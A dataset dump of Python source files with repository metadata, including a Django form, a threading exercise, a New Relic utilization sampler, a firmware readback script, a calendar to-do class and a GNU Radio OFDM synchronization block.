blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
54845572e238691b2b0ae40bfb43623239ce1852 | 69690c2d9dc55c2c6914662233d8917ca592a6c1 | /helpers/commas.py | ec4a0dae9140e6fe6a88e830b2faa568191218aa | [] | no_license | aaron-price/reactjo-extension-template | 6fba82d0ca82c2eb869dd81d45bb63fb27377965 | 8350fc26be7c9643f4839c995702fbe62d1650e1 | refs/heads/master | 2021-01-19T08:20:42.627541 | 2017-11-10T22:35:38 | 2017-11-10T22:35:38 | 100,652,190 | 0 | 0 | null | 2017-11-10T22:35:39 | 2017-08-17T23:07:53 | Python | UTF-8 | Python | false | false | 235 | py | # Should add commas and a space if necessary, remove if unnecessary.
def soft_comma(item1, item2):
if item1[-1] == ',':
item1 = item1[:-1]
if item2[0] == ',':
item2 = item2[1:]
return item1 + ', ' + item2
| [
"coding.aaronp@gmail.com"
] | coding.aaronp@gmail.com |
6ae72a7c5cf7a2919d3ed71cdf606c8528f027bc | cd7ce64a07079ce50c5596b32be48a094407825b | /fatnlazyapp/forms.py | 0a00818b26b7a83395c66f82a61520c54a58dbdf | [] | no_license | rprajapati1/FindNRide | 6abbf36d2536e2abf1f8dc0aa2bc354981a7d571 | 4e592f8afc6645243b8159d497b1821ac681ab66 | refs/heads/master | 2021-01-10T04:25:40.278769 | 2015-12-23T23:21:04 | 2015-12-23T23:21:04 | 48,515,055 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django import forms
class GoogleForm(forms.Form):
location = forms.CharField(widget=forms.TextInput,initial='Eg. Berkeley, Oakland, San Francisco etc.',label = 'location', required=True)
location.widget.attrs.update({'id' : 'form-control'})
| [
"richaprajapati@Richas-MacBook-Pro.local"
] | richaprajapati@Richas-MacBook-Pro.local |
c1594fe7488ed25aca35c72df5aa692e134f6011 | ab23a50fa60e1576b955301f9ca97ae73420276c | /Threading.py | 78f779e17257c28d7c79668432b327b5591fd037 | [] | no_license | RockfordFaurot/Git_Python | 3977643b157cc56a53ab24bcde61c790561f46c8 | 43eb82f549d9e5eb7f466c99fbb4d6d89cb72b52 | refs/heads/master | 2021-05-02T05:52:29.759909 | 2018-02-09T03:20:20 | 2018-02-09T03:20:20 | 120,848,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,708 | py | #create 100 widgites as fast as possible:
#get several workers to make a widget include a delay for each worker:
#start by writing to difrent documents,
#then write to the same document onec you get that figured out.
import time
import threading
#set up a file to read and write to:
#file needs to already exist in order to use "r+" read and write function
work_file = open("/Users/rockfordfaurot/Documents/Programing/Python/Git_Python/Threading_file.txt", "r+")
#create worker class:
class Worker(object): #object is necisary to call __init__ during inharitince
def __init__(self, pace):
self.pace = pace #this is how long it take to work
self.task = 0
def run(self):
while self.task < 10:
self.task+=1
time.sleep(self.pace)
work_file.write("Task "+str(self.task)+" has been accomplished.\n")
#print("Task "+str(self.task)+" has been accomplished.")
class Worker2(object):
def __init__(self, pace):
self.pace = pace
self.jobs = 0
def run(self):
while self.jobs < 8:
self.jobs+=1
time.sleep(self.pace)
work_file.write("Job "+str(self.jobs)+" has been completed.\n")
#print("Job "+str(self.jobs)+" has been compleated.")
class SuperViser(Worker):
def __init__(self, pace):
self.pace=pace
self.count=0
def check(self):
while self.count < 5:
self.count+=1
time.sleep(self.pace)
work_file.write("Work Harder!!\n")
#print("Work Harder!!!!")
Jim = Worker(1)
Steve = Worker2(1.5)
Jhon = SuperViser(2)
Jim.run()
Steve.run()
Jhon.check()
work_file.close()
#you need this statment to preforme multithreading:
# if __name__ == '__main__':
# NumOfThreads = 4
# threadList = []
# t = threading.Thread(target=function, args=(tup,))
# t.start()
| [
"rockfordfaurot@Rockfords-MacBook-Pro.local"
] | rockfordfaurot@Rockfords-MacBook-Pro.local |
512a43263d45f6d4fbf19a27ad961a1de09eba30 | fa5cb3cb27132a330673650afa1d68dd35f15251 | /newrelic/core/thread_utilization.py | fd57ba9f86fc98a03d51ad739747f385a68950b0 | [
"Apache-2.0"
] | permissive | jbeveland27/newrelic-python-agent | 95b4fdf253915100bc62bbd143066f589efc3ab9 | 86c78370ace1eba18e05de5e37aadb880f5f3ac4 | refs/heads/main | 2023-07-12T06:40:58.741312 | 2021-08-19T23:37:14 | 2021-08-19T23:37:14 | 398,122,410 | 1 | 0 | Apache-2.0 | 2021-08-20T01:38:35 | 2021-08-20T01:38:33 | null | UTF-8 | Python | false | false | 4,451 | py | # Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from newrelic.samplers.decorators import data_source_factory
try:
from newrelic.core._thread_utilization import ThreadUtilization
except ImportError:
ThreadUtilization = None
_utilization_trackers = {}
def utilization_tracker(application):
return _utilization_trackers.get(application)
class ThreadUtilizationDataSource(object):
def __init__(self, application):
self._consumer_name = application
self._utilization_tracker = None
self._last_timestamp = None
self._utilization = None
def start(self):
if ThreadUtilization:
utilization_tracker = ThreadUtilization()
_utilization_trackers[self._consumer_name] = utilization_tracker
self._utilization_tracker = utilization_tracker
self._last_timestamp = time.time()
self._utilization = self._utilization_tracker.utilization_count()
def stop(self):
try:
self._utilization_tracker = None
self._last_timestamp = None
self._utilization = None
del _utilization_trackers[self.source_name]
except Exception:
pass
def __call__(self):
if self._utilization_tracker is None:
return
now = time.time()
# TODO This needs to be pushed down into _thread_utilization.c.
# In doing that, need to fix up UtilizationClass count so the
# reset is optional because in this case a read only variant is
# needed for getting a per request custom metric of the
# utilization during period of the request.
#
# TODO This currently doesn't take into consideration coroutines
# and instance bust percentage is percentage of a single thread
# and not of total available coroutines. Not sure whether can
# generate something meaningful for coroutines. Also doesn't
# work for asynchronous systems such as Twisted.
new_utilization = self._utilization_tracker.utilization_count()
elapsed_time = now - self._last_timestamp
utilization = new_utilization - self._utilization
utilization = utilization / elapsed_time
self._last_timestamp = now
self._utilization = new_utilization
total_threads = None
try:
# Recent mod_wsgi versions publish the number of actual
# threads so we can use this real value instead of the
# calculated value. This is important in order to get the
# correct utilization value for mod_wsgi daemon mode as the
# way it manages the thread pool it may not actually
# activate all available threads if the requirement isn't
# there for them. Thus the utilization figure will be too
# high as would only be calculated relative to the activated
# threads and not the total of what is actually available.
import mod_wsgi
total_threads = mod_wsgi.threads_per_process
except Exception:
pass
if total_threads is None:
total_threads = self._utilization_tracker.total_threads()
if total_threads:
# Don't report any metrics if don't detect any threads
# available and in use for handling web transactions,
# otherwise we end up report zero metrics for task systems
# such as Celery which skews the results wrongly.
yield ('Instance/Available', total_threads)
yield ('Instance/Used', utilization)
busy = total_threads and utilization/total_threads or 0.0
yield ('Instance/Busy', busy)
@data_source_factory(name='Thread Utilization')
def thread_utilization_data_source(settings, environ):
return ThreadUtilizationDataSource(environ['consumer.name'])
| [
"opensource@newrelic.com"
] | opensource@newrelic.com |
d19bc094a12f3f31cffdb9db2d122aa856e013f6 | b4663bb969dc6c54bef96c3290d7ec59e6ff3f98 | /SeerSonic/testcase/readtest.py | dc2b53df661d6ff51fb5ec2cdb2fb32ca2517eba | [] | no_license | XiaoxingChen/iapTool | 6c78123feb178e41e788d331c548b6de20f600f1 | bb9c050e5652b4fb2d033de507d90f13329032ad | refs/heads/master | 2020-04-10T17:15:32.468525 | 2018-03-29T02:58:56 | 2018-03-29T02:58:56 | 84,140,100 | 0 | 1 | null | 2018-02-09T07:34:24 | 2017-03-07T01:34:10 | Python | UTF-8 | Python | false | false | 1,228 | py | import sys
sys.path.append('../')
sys.path.append('../../')
import os
import json
os.chdir(sys.path[0])
from time import sleep
from SeerSonic.seersoniciapdev import CSeerSonicIapDev
from chardev.udpchardev import UdpCharDev
try:
with open('..\\User\\ipconfig.json', 'r') as f:
data = json.load(f)
f.close()
F4K_ip = data['inet addr']
except:
F4K_ip = '192.168.192.4'
if(2 == len(sys.argv)):
bin_file = sys.argv[1]
#*.gyro.bin
tail2 = bin_file[-7:-4]
if tail2 != '.ss':
print('not the firmware for seer controller, press enter to continue...')
input()
sys.exit()
else:
bin_file = '../Output/Project.bin'
BOOTLOADER_START_ADDR = 0x08000000
BOOTPARAM_ADDR = 0x08007800
APP_START_ADDR = 0x08008000
chardev = UdpCharDev((F4K_ip, 15003), (F4K_ip, 15003))
udpIapDev = CSeerSonicIapDev(chardev)
udpIapDev.setforwardmode()
udpIapDev.settargetboardbootloader()
FWV = udpIapDev.getbootloaderversion()
print('firmware version V%X.%X' % (FWV >> 4, FWV & 0xF))
# udpIapDev.loadbin(bin_file, APP_START_ADDR)
udpIapDev.readbin('readback.ss.bin', APP_START_ADDR)
udpIapDev.jumpToAddress(APP_START_ADDR)
udpIapDev.resetforwardmode()
os.system('pause')
sys.exit()
| [
"cxx@seer-robotics.com"
] | cxx@seer-robotics.com |
bf6231fdd8679cee283e8777cdaaf0150815235a | 3af0b6e3f192a56345c940dd80b28c7f3b5bcc42 | /python/houseOfPies.py | 2f79d08b501ff0adcde66a1dfb29a1400f7f1c4d | [] | no_license | mollygilbert389/practiceCode | 09876ae25656e0d85fd15c01733d1140f254d5a3 | 811405883327c275896cb0f6e94b95cb094e9d83 | refs/heads/master | 2023-01-14T00:50:23.093046 | 2019-09-17T20:23:50 | 2019-09-17T20:23:50 | 184,509,020 | 0 | 0 | null | 2023-01-04T00:52:20 | 2019-05-02T02:16:37 | JavaScript | UTF-8 | Python | false | false | 1,078 | py | shopping = "y"
pie_purchases = [0,0,0,0,0,0,0,0,0,0]
pie_list = ["Pecan", "Apple Crisp", "Bean", "Banoffee", "Black Bun", "Blueberry", "Buko", "Burel", "Tamale", "Lemon"]
print("Welcome to the house of Pies! Here are our pies!: ")
while shopping == "y":
print("---------------------------------------------------------")
print("(1) Pecan, (2) Apple Crisp, (3) Bean, (4) Banoffee, " +
"(5) Black Bun, (6) Blueberry, (7) Buko, (8) Burek, " +
"(9) Tamale, (10) Lemon " )
pie_choice = input("Which would you like?")
pie_purchases[int(pie_choice) -1] +=1
print("---------------------------------------------------------")
print("Great! We'll gave that " + pie_list[int(pie_choice) -1] + " right out for you.")
shopping = input("Would you like to make another purchase: (y)es or (n)o?")
print("---------------------------------------------------------")
print("You purchased: ")
for pie_index in range(len(pie_list)):
print(str(pie_purchases[pie_index]) + " " + str(pie_list[pie_index]))
| [
"msgilbert389@gmail.com"
] | msgilbert389@gmail.com |
badc3f499d4497e8cb855a63837126b58ed27f20 | 758b475451f96bb63b0fd4922beb7b6e1ed40137 | /PyCalendar/branches/server-stable/src/pycalendar/vtodo.py | 9dbe55e934316b748a5ee5e034cfe4f1126faa63 | [
"Apache-2.0"
] | permissive | svn2github/calendarserver-raw | da9f0bfa94d8080a9803eab5e4630be21645b329 | 37edd10248e8c13dc13f65ff52c72df1783e3499 | refs/heads/master | 2023-01-11T00:51:40.137861 | 2015-01-07T00:07:46 | 2015-01-07T00:07:46 | 14,276,537 | 1 | 0 | null | 2022-12-21T13:08:16 | 2013-11-10T13:09:44 | Python | UTF-8 | Python | false | false | 10,786 | py | ##
# Copyright (c) 2007-2011 Cyrus Daboo. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from pycalendar import definitions
from pycalendar import itipdefinitions
from pycalendar.componentrecur import PyCalendarComponentRecur
from pycalendar.datetime import PyCalendarDateTime
from pycalendar.property import PyCalendarProperty
import cStringIO as StringIO
class PyCalendarVToDo(PyCalendarComponentRecur):
OVERDUE = 0
DUE_NOW= 1
DUE_LATER = 2
DONE = 3
CANCELLED= 4
@staticmethod
def sort_for_display(e1, e2):
s1 = e1.getMaster()
s2 = e2.getMaster()
# Check status first (convert None -> Needs action for tests)
status1 = s1.self.mStatus
status2 = s2.self.mStatus
if status1 == definitions.eStatus_VToDo_None:
status1 = definitions.eStatus_VToDo_NeedsAction
if status2 == definitions.eStatus_VToDo_None:
status2 = definitions.eStatus_VToDo_NeedsAction
if status1 != status2:
# More important ones at the top
return status1 < status2
# At this point the status of each is the same
# If status is cancelled sort by start time
if s1.self.mStatus == definitions.eStatus_VToDo_Cancelled:
# Older ones at the bottom
return s1.mStart > s2.mStart
# If status is completed sort by completion time
if s1.self.mStatus == definitions.eStatus_VToDo_Completed:
# Older ones at the bottom
return s1.self.mCompleted > s2.self.mCompleted
# Check due date exists
if s1.mHasEnd != s2.mHasEnd:
now = PyCalendarDateTime()
now.setToday()
# Ones with due dates after today below ones without due dates
if s1.hasEnd():
return s1.mEnd <= now
elif s2.hasEnd():
return now < s2.mEnd
# Check due dates if present
if s1.mHasEnd:
if s1.mEnd != s2.mEnd:
# Soonest dues dates above later ones
return s1.mEnd < s2.mEnd
# Check priority next
if s1.self.mPriority != s2.self.mPriority:
# Higher priority above lower ones
return s1.self.mPriority < s2.self.mPriority
# Just use start time - older ones at the top
return s1.mStart < s2.mStart
def __init__(self, parent=None):
super(PyCalendarVToDo, self).__init__(parent=parent)
self.mPriority = 0
self.mStatus = definitions.eStatus_VToDo_None
self.mPercentComplete = 0
self.mCompleted = PyCalendarDateTime()
self.mHasCompleted = False
def duplicate(self, parent=None):
other = super(PyCalendarVToDo, self).duplicate(parent=parent)
other.mPriority = self.mPriority
other.mStatus = self.mStatus
other.mPercentComplete = self.mPercentComplete
other.mCompleted = self.mCompleted.duplicate()
other.mHasCompleted = self.mHasCompleted
return other
def getType(self):
return definitions.cICalComponent_VTODO
def getMimeComponentName(self):
return itipdefinitions.cICalMIMEComponent_VTODO
def addComponent(self, comp):
# We can embed the alarm components only
if comp.getType() == definitions.cICalComponent_VALARM:
super(PyCalendarVToDo, self).addComponent(comp)
else:
raise ValueError
def getStatus(self):
return self.mStatus
def setStatus(self, status):
self.mStatus = status
def getStatusText(self):
sout = StringIO()
if self.mStatus in (definitions.eStatus_VToDo_NeedsAction, definitions.eStatus_VToDo_InProcess):
if self.hasEnd():
# Check due date
today = PyCalendarDateTime()
today.setToday()
if self.getEnd() > today:
sout.append("Due: ")
whendue = self.getEnd() - today
if (whendue.getDays() > 0) and (whendue.getDays() <= 7):
sout.write(whendue.getDays())
sout.write(" days")
else:
sout.write(self.getEnd().getLocaleDate(PyCalendarDateTime.NUMERICDATE))
elif self.getEnd() == today:
sout.write("Due today")
else:
sout.write("Overdue: ")
overdue = today - self.getEnd()
if overdue.getWeeks() != 0:
sout.write(overdue.getWeeks())
sout.write(" weeks")
else:
sout.write(overdue.getDays() + 1)
sout.write(" days")
else:
sout.write("Not Completed")
elif self.mStatus == definitions.eStatus_VToDo_Completed:
if self.hasCompleted():
sout.write("Completed: ")
sout.write(self.getCompleted().getLocaleDate(PyCalendarDateTime.NUMERICDATE))
else:
sout.write("Completed")
elif definitions.eStatus_VToDo_Cancelled:
sout.write("Cancelled")
return sout.toString()
def getCompletionState(self):
if self.mStatus in (definitions.eStatus_VToDo_NeedsAction, definitions.eStatus_VToDo_InProcess):
if self.hasEnd():
# Check due date
today = PyCalendarDateTime()
today.setToday()
if self.getEnd() > today:
return PyCalendarVToDo.DUE_LATER
elif self.getEnd() == today:
return PyCalendarVToDo.DUE_NOW
else:
return PyCalendarVToDo.OVERDUE
else:
return PyCalendarVToDo.DUE_NOW
elif self.mStatus == definitions.eStatus_VToDo_Completed:
return PyCalendarVToDo.DONE
elif self.mStatus == definitions.eStatus_VToDo_Cancelled:
return PyCalendarVToDo.CANCELLED
def getPriority(self):
return self.mPriority
def setPriority(self, priority):
self.mPriority = priority
def getCompleted(self):
return self.mCompleted
def hasCompleted(self):
return self.mHasCompleted
def finalise(self):
# Do inherited
super(PyCalendarVToDo, self).finalise()
# Get DUE
temp = self.loadValueDateTime(definitions.cICalProperty_DUE)
if temp is None:
# Try DURATION instead
temp = self.loadValueDuration(definitions.cICalProperty_DURATION)
if temp is not None:
self.mEnd = self.mStart + temp
self.mHasEnd = True
else:
self.mHasEnd = False
else:
self.mHasEnd = True
self.mEnd = temp
# Get PRIORITY
self.mPriority = self.loadValueInteger(definitions.cICalProperty_PRIORITY)
# Get STATUS
temp = self.loadValueString(definitions.cICalProperty_STATUS)
if temp is not None:
if temp == definitions.cICalProperty_STATUS_NEEDS_ACTION:
self.mStatus = definitions.eStatus_VToDo_NeedsAction
elif temp == definitions.cICalProperty_STATUS_COMPLETED:
self.mStatus = definitions.eStatus_VToDo_Completed
elif temp == definitions.cICalProperty_STATUS_IN_PROCESS:
self.mStatus = definitions.eStatus_VToDo_InProcess
elif temp == definitions.cICalProperty_STATUS_CANCELLED:
self.mStatus = definitions.eStatus_VToDo_Cancelled
# Get PERCENT-COMPLETE
self.mPercentComplete = self.loadValueInteger(definitions.cICalProperty_PERCENT_COMPLETE)
# Get COMPLETED
temp = self.loadValueDateTime(definitions.cICalProperty_COMPLETED)
self.mHasCompleted = temp is not None
if self.mHasCompleted:
self.mCompleted = temp
# Editing
def editStatus(self, status):
# Only if it is different
if self.mStatus != status:
# Updated cached values
self.mStatus = status
# Remove existing STATUS & COMPLETED items
self.removeProperties(definitions.cICalProperty_STATUS)
self.removeProperties(definitions.cICalProperty_COMPLETED)
self.mHasCompleted = False
# Now create properties
value = None
if status == definitions.eStatus_VToDo_NeedsAction:
value = definitions.cICalProperty_STATUS_NEEDS_ACTION
if status == definitions.eStatus_VToDo_Completed:
value = definitions.cICalProperty_STATUS_COMPLETED
# Add the completed item
self.mCompleted.setNowUTC()
self.mHasCompleted = True
prop = PyCalendarProperty(definitions.cICalProperty_STATUS_COMPLETED, self.mCompleted)
self.addProperty(prop)
elif status == definitions.eStatus_VToDo_InProcess:
value = definitions.cICalProperty_STATUS_IN_PROCESS
elif status == definitions.eStatus_VToDo_Cancelled:
value = definitions.cICalProperty_STATUS_CANCELLED
prop = PyCalendarProperty(definitions.cICalProperty_STATUS, value)
self.addProperty(prop)
def editCompleted(self, completed):
# Remove existing COMPLETED item
self.removeProperties(definitions.cICalProperty_COMPLETED)
self.mHasCompleted = False
# Always UTC
self.mCompleted = completed.duplicate()
self.mCompleted.adjustToUTC()
self.mHasCompleted = True
prop = PyCalendarProperty(definitions.cICalProperty_STATUS_COMPLETED, self.mCompleted)
self.addProperty(prop)
def sortedPropertyKeyOrder(self):
return (
definitions.cICalProperty_UID,
definitions.cICalProperty_RECURRENCE_ID,
definitions.cICalProperty_DTSTART,
definitions.cICalProperty_DURATION,
definitions.cICalProperty_DUE,
definitions.cICalProperty_COMPLETED,
)
| [
"cyrusdaboo@e27351fd-9f3e-4f54-a53b-843176b1656c"
] | cyrusdaboo@e27351fd-9f3e-4f54-a53b-843176b1656c |
5de0ced8f29a970a49932adc2ba0eeadfd743a9d | 4791a6b7dd1e74ef8037ac017145a1e0b9adbe10 | /GNU-Radio-Repositories/LEGACY/gr-ofdm-rx/python/SynchAndChanEst.py | 08c9a7ba973bff975f2e7de2ffd89acb28d722ab | [] | no_license | tayloreisman16/LTE-GNU-Radio-Code | c76fe451296db5ef11e01f012a6c06514810a523 | e3aabec57e8f02cfaec55d0e774c00b4ee818758 | refs/heads/main | 2023-06-22T03:37:13.691881 | 2021-07-22T19:40:10 | 2021-07-22T19:40:10 | 329,785,446 | 1 | 0 | null | 2021-04-02T23:05:53 | 2021-01-15T02:13:36 | Python | UTF-8 | Python | false | false | 10,548 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy as np
import pickle
import datetime
from gnuradio import gr
file_name = 'chan_est_time.pckl'
class SynchAndChanEst(gr.sync_block):
"""
docstring for block SynchAndChanEst
"""
def __init__(self, num_ofdm_symb, nfft, cp_len, num_synch_bins, synch_dat, num_data_bins, SNR, directory_name, file_name_cest, diagnostics):
self.num_ofdm_symb = num_ofdm_symb
self.nfft = nfft
self.cp_len = cp_len
self.num_synch_bins = num_synch_bins
# # Zadoff Chu Generation
# self.prime_num = 23
#
# if self.num_synch_bins % 2 == 0:
# seq0 = np.array(range(self.num_synch_bins))
# self.zadoff_chu = np.exp(-1j * (2 * np.pi / self.num_synch_bins) * self.prime_num * seq0 * seq0 / 2)
#
# elif self.num_synch_bins % 2 == 1:
# seq0 = np.array(range(self.num_synch_bins))
# self.zadoff_chu = np.exp(
# -1j * (2 * np.pi / self.num_synch_bins) * self.prime_num * seq0 * (seq0 + 1) / 2)
self.synch_bins_used_N = (list(range(-int(self.num_synch_bins / 2), 0, 1)) +
list(range(1, int(self.num_synch_bins / 2) + 1, 1)))
self.synch_bins_used_P = list((np.array(self.synch_bins_used_N) + self.nfft) % self.nfft)
self.L_synch = len(self.synch_bins_used_P)
self.synch_dat = synch_dat # example [1, 1] or [2, 1]
self.M = [self.synch_dat[0], self.num_synch_bins]
self.MM = np.prod(self.M)
# Zadoff Chu Generation
self.p = 37
if self.num_synch_bins % 2 == 0:
tmp0 = np.array(range(self.MM))
xx = tmp0 * tmp0
elif self.num_synch_bins % 2 == 1:
tmp0 = np.array(range(self.MM))
xx = tmp0 * (tmp0+1)
tmpvsynch = [(-1j * (2 * np.pi / self.MM) * self.p / 2.0) * kk for kk in xx]
self.zadoff_chu = np.exp(tmpvsynch)
# print(self.zadoff_chu.shape)
# print(self.M)
# print(self.synch_bins_used_P)
self.num_data_bins = num_data_bins
self.bins_used_N = (list(range(-int(self.num_data_bins / 2), 0, 1)) +
list(range(1, int(self.num_data_bins / 2) + 1, 1)))
self.bins_used_P = list((np.array(self.bins_used_N) + self.nfft) % self.nfft)
# print("Bins used P", self.bins_used_P)
self.cor_obs = -1
self.del_mat_exp = np.tile(np.exp((1j * (2.0 * np.pi / self.nfft)) * (
np.outer(list(range(self.cp_len + 1)), list(self.synch_bins_used_P)))), (1, self.M[0]))
self.stride_val = self.cp_len - 1
self.start_samp = self.cp_len
self.rx_b_len = self.nfft + self.cp_len
self.max_num_corr = 100
self.time_synch_ref = np.zeros((self.max_num_corr, 3))
self.est_chan_time = np.zeros((self.max_num_corr, self.nfft), dtype=complex)
self.est_synch_freq = np.zeros((self.max_num_corr, len(self.zadoff_chu)), dtype=complex)
self.est_chan_freq_P = np.zeros((self.max_num_corr, self.nfft), dtype=complex)
self.est_data_freq = np.zeros((self.max_num_corr, self.num_data_bins), dtype=complex)
self.rx_data_time = np.zeros((1, self.M[0] * self.nfft), dtype=complex) # first dimension = no of antennas
self.synchdat00 = np.zeros((1, self.M[0] * self.num_synch_bins), dtype=complex)
self.del_mat = []
self.eq_gain = []
self.eq_gain_ext = []
self.eq_gain_q = []
self.SNR = SNR
self.count = 0
self.diagnostics = diagnostics
self.directory_name = directory_name
self.file_name_cest = file_name_cest
gr.sync_block.__init__(self,
name="SynchAndChanEst",
in_sig=[np.complex64],
out_sig=[np.complex64])
def work(self, input_items, output_items):
in0 = input_items[0]
out = output_items[0]
n_trials = int(np.around(len(in0) / self.stride_val))
for P in list(range(n_trials)):
if self.M[0] * self.rx_b_len + P * self.stride_val + self.nfft + self.start_samp < len(in0):
for LL in list(range(self.M[0])):
aaa = self.rx_b_len * LL + P * self.stride_val + self.start_samp
bbb = self.rx_b_len * LL + P * self.stride_val + self.start_samp + self.nfft
self.rx_data_time[0][LL * self.nfft:(LL + 1) * self.nfft] = in0[aaa:bbb]
tmp_1vec = np.zeros((self.M[0], self.nfft), dtype=complex)
for LL in list(range(self.M[0])):
tmp_1vec[LL][:] = np.fft.fft(self.rx_data_time[0][LL * self.nfft:(LL + 1) * self.nfft], self.nfft)
self.synchdat00[0][LL * self.num_synch_bins:(LL + 1) * self.num_synch_bins] = tmp_1vec[LL][self.synch_bins_used_P]
synchdat0 = np.reshape(self.synchdat00, (1, self.num_synch_bins * self.M[0]))
# print(synchdat0.shape)
p_est = np.sqrt(len(synchdat0[0]) / sum(np.multiply(synchdat0[0][:], np.conj(synchdat0[0][:]))))
synchdat = [p_est * kk for kk in synchdat0]
tmp_2mat = np.matmul(self.del_mat_exp, np.diag(synchdat[0]))
self.del_mat = np.matmul(tmp_2mat, np.conj(self.zadoff_chu))
dmax_ind = np.argmax((abs(self.del_mat)))
dmax_val = np.max((abs(self.del_mat)))
if dmax_val > 0.4 * len(synchdat[0]):
tim_synch_ind = self.time_synch_ref[max(self.cor_obs, 0)][0]
if ((P * self.stride_val + self.start_samp - tim_synch_ind > 2 * self.cp_len + self.nfft)
or self.cor_obs == -1):
self.cor_obs += 1
self.time_synch_ref[self.cor_obs][0] = P * self.stride_val + self.start_samp
self.time_synch_ref[self.cor_obs][1] = dmax_ind
self.time_synch_ref[self.cor_obs][2] = int(dmax_val)
del_vec = self.del_mat_exp[dmax_ind][:]
data_recov = np.matmul(np.diag(del_vec), synchdat[0])
zcwn = [(1.0 / self.SNR) + qq for qq in np.ones(len(self.zadoff_chu))]
tmp_v1 = np.divide(np.matmul(np.diag(data_recov), np.conj(self.zadoff_chu)), zcwn)
chan_est00 = np.reshape(tmp_v1, (self.M[0], self.L_synch))
chan_est = np.sum(chan_est00, axis=0) / float(self.M[0])
chan_est1 = np.zeros((1, self.nfft), dtype=np.complex)
chan_est1[0][self.synch_bins_used_P] = chan_est
self.est_chan_freq_P[self.cor_obs][:] = chan_est1[0][:]
chan_est_tim = np.fft.ifft(chan_est1, self.nfft)
if self.diagnostics == 1:
date_time = datetime.datetime.now().strftime('%Y_%m_%d_%Hh_%Mm')
f = open(str(self.directory_name) + str(date_time) + str(self.file_name_cest) + '.pckl', 'wb')
pickle.dump(chan_est_tim, f, protocol=2)
f.close()
self.est_chan_time[self.cor_obs][0:self.nfft] = chan_est_tim[0][0:self.nfft]
chan_mag = np.matmul(np.diag(chan_est), np.conj(chan_est))
eq_gain_0 = [1.0 / self.SNR + vv for vv in chan_mag]
self.eq_gain = np.divide(np.conj(chan_est), eq_gain_0)
self.eq_gain_ext = np.tile(self.eq_gain, self.M[0])
self.est_synch_freq[self.cor_obs][:] = np.matmul(np.diag(self.eq_gain_ext), data_recov)
# <+signal processing here+>
for P in list(range(self.cor_obs+1)):
if self.time_synch_ref[P][0] + self.M[0] * self.rx_b_len + self.nfft - 1 <= len(in0):
data_ptr = int(self.time_synch_ref[P][0] + self.M[0]*self.rx_b_len)
print("data pointer", data_ptr)
data_buff_time = in0[data_ptr: data_ptr + self.nfft]
t_vec = np.fft.fft(data_buff_time, self.nfft)
# print(self.bins_used_P)
freq_data_0 = t_vec[self.bins_used_P]
p_est0 = np.sqrt(len(freq_data_0)/(np.dot(freq_data_0, np.conj(freq_data_0))))
data_recov_0 = freq_data_0 * p_est0
arg_val = ([((1j * (2 * np.pi / self.nfft)) *
self.time_synch_ref[P][1]) * kk for kk in self.bins_used_P])
data_recov_z = np.matmul(np.diag(data_recov_0), np.exp(arg_val))
chan_est_dat = self.est_chan_freq_P[P][self.bins_used_P]
chan_mag_z = np.matmul(np.diag(chan_est_dat), np.conj(chan_est_dat))
eq_gain_z = [1.0 / self.SNR + vv for vv in chan_mag_z]
self.eq_gain_q = np.divide(np.conj(chan_est_dat), eq_gain_z)
self.est_data_freq[P][:] = np.matmul(np.diag(self.eq_gain_q), data_recov_z)
# print("P", P)
# print("Data Est Freq Shape", self.est_data_freq.shape)
corr_size = self.num_ofdm_symb/sum(self.synch_dat)
# print(corr_size)
# print("Data Est Freq", self.est_data_freq)
# print(self.est_data_freq[0:corr_size][:])
data_out = np.reshape(self.est_data_freq[0:corr_size][:], (1, corr_size * np.size(self.est_data_freq, 1)))
# print(data_out.shape)
if self.count > 0:
# out[0:data_out.shape[1]] = data_out
out[0:np.size(data_out, 1)] = data_out[:, np.newaxis]
# print(out[0:np.size(data_out, 1)])
self.count += 1
self.cor_obs = 0
return len(output_items[0])
| [
"noreply@github.com"
] | tayloreisman16.noreply@github.com |
